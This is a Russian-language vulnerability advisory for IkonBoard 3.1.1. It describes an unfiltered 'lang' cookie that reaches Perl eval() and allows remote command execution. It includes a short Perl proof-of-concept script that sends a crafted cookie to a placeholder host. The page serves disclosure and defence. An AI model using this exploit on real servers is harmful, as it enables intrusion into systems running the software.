Дата публикации: | 08.04.2003 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1916 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость в проверке правильности ввода обнаружена в IkonBoard. Удаленный пользователь может выполнить команды на сервере. Как сообщается, функция LoadLanguage() в 'Sources/Lib/FUNC.pm' не в состоянии фильтровать данные пользователя в 'lang' куки. Поскольку в последствии результаты передаются к Perl eval() функции, как часть имени директории, удаленный пользователь может создать специально обработанный 'lang' куки, чтобы выполнять произвольные команды на системе. Эксплоит: #!/usr/bin/perl -w use strict; my $HOST = 'www.example.domain'; my $PATH = '/cgi-bin/ikonboard.cgi'; use IO::Socket; my $sock = IO::Socket::INET->new("$HOST:80") or die "connect: $!"; $sock->print(<<END) or die "write: $!"; GET $PATH HTTP/1.1 Host: $HOST Cookie: lang=%2E%00%22 Connection: close END print while <$sock>;Уязвимость обнаружена в IkonBoard 3.1.1 |
Ссылки: | IkonBoard v3.1.1: arbitrary command execution |